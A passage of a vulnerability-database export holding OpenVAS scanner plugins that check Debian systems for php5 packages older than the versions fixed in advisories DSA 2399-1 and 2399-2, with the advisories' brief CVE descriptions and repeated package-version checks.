res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1938", "CVE-2011-4885", "CVE-2011-2483", "CVE-2012-0057", "CVE-2011-4566"], "description": "The remote host is missing an update to php5\nannounced via advisory DSA 2399-2.", "modified": "2017-07-07T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:70717", "href": "http://plugins.openvas.org/nasl.php?oid=70717", "type": "openvas", "title": "Debian Security Advisory DSA 2399-2 (php5)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2399_2.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2399-2 (php5)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A regression was found in the fix for PHP's XSLT transformations\n(CVE-2012-0057). Updated packages are now available to address this\nregression. For reference, the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in PHP, the web scripting\nlanguage. The Common Vulnerabilities and Exposures project identifies\nthe following issues:\n\nCVE-2011-1938\n\nThe UNIX socket handling allowed attackers to trigger a buffer overflow\nvia a long path name.\n\nCVE-2011-2483\n\nThe crypt_blowfish function did not properly handle 8-bit characters,\nwhich made it easier for attackers to determine a cleartext password\nby using knowledge of a password hash.\n\nCVE-2011-4566\n\nWhen used on 32 bit platforms, the exif extension could be used to\ntrigger an integer overflow in the exif_process_IFD_TAG function\nwhen processing a JPEG file.\n\nCVE-2011-4885\n\nIt was possible to trigger hash collisions predictably when parsing\nform parameters, which allows remote attackers to cause a denial of\nservice by sending many crafted parameters.\n\nCVE-2012-0057\n\nWhen applying a crafted XSLT transform, an attacker could write files\nto arbitrary places in the filesystem.\n\nNOTE: the fix for CVE-2011-2483 required changing the behaviour of this\nfunction: it is now incompatible with some old (wrongly) generated hashes\nfor passwords containing 8-bit characters. See the package NEWS entry\nfor details. This change has not been applied to the Lenny version of PHP.\n\nNOTE: at the time of release packages for some architectures are still\nbeing built. They will be installed into the archive as soon as they\narrive.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 5.2.6.dfsg.1-1+lenny15.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 5.3.3-7+squeeze6.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems have been fixed in version 5.3.9-1.\n\nWe recommend that you upgrade your php5 packages.\";\ntag_summary = \"The remote host is missing an update to php5\nannounced via advisory DSA 2399-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202399-2\";\n\nif(description)\n{\n script_id(70717);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1938\", \"CVE-2011-2483\", \"CVE-2011-4566\", \"CVE-2011-4885\", \"CVE-2012-0057\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 06:38:45 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2399-2 (php5)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1938", "CVE-2011-4885", "CVE-2011-2483", "CVE-2012-0057", "CVE-2011-4566"], "description": "The remote host is missing an update to php5\nannounced via advisory DSA 2399-1.", "modified": "2019-03-18T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:136141256231070716", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070716", "type": "openvas", "title": "Debian Security Advisory DSA 2399-1 (php5)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2399_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2399-1 (php5)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70716\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1938\", \"CVE-2011-2483\", \"CVE-2011-4566\", \"CVE-2011-4885\", \"CVE-2012-0057\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 06:36:57 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2399-1 (php5)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6|7)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202399-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in PHP, the web scripting\nlanguage. The Common Vulnerabilities and Exposures project identifies\nthe following issues:\n\nCVE-2011-1938\n\nThe UNIX socket handling allowed attackers to trigger a buffer overflow\nvia a long path name.\n\nCVE-2011-2483\n\nThe crypt_blowfish function did not properly handle 8-bit characters,\nwhich made it easier for attackers to determine a cleartext password\nby using knowledge of a password hash.\n\nCVE-2011-4566\n\nWhen used on 32 bit platforms, the exif extension could be used to\ntrigger an integer overflow in the exif_process_IFD_TAG function\nwhen processing a JPEG file.\n\nCVE-2011-4885\n\nIt was possible to trigger hash collisions predictably when parsing\nform parameters, which allows remote attackers to cause a denial of\nservice by sending many crafted parameters.\n\nCVE-2012-0057\n\nWhen applying a crafted XSLT transform, an attacker could write files\nto arbitrary places in the filesystem.\n\nNOTE: the fix for CVE-2011-2483 required changing the behaviour of this\nfunction: it is now incompatible with some old (wrongly) generated hashes\nfor passwords containing 8-bit characters. See the package NEWS entry\nfor details. This change has not been applied to the Lenny version of PHP.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 5.2.6.dfsg.1-1+lenny14.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 5.3.3-7+squeeze5.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems have been fixed in version 5.3.9-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your php5 packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to php5\nannounced via advisory DSA 2399-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", 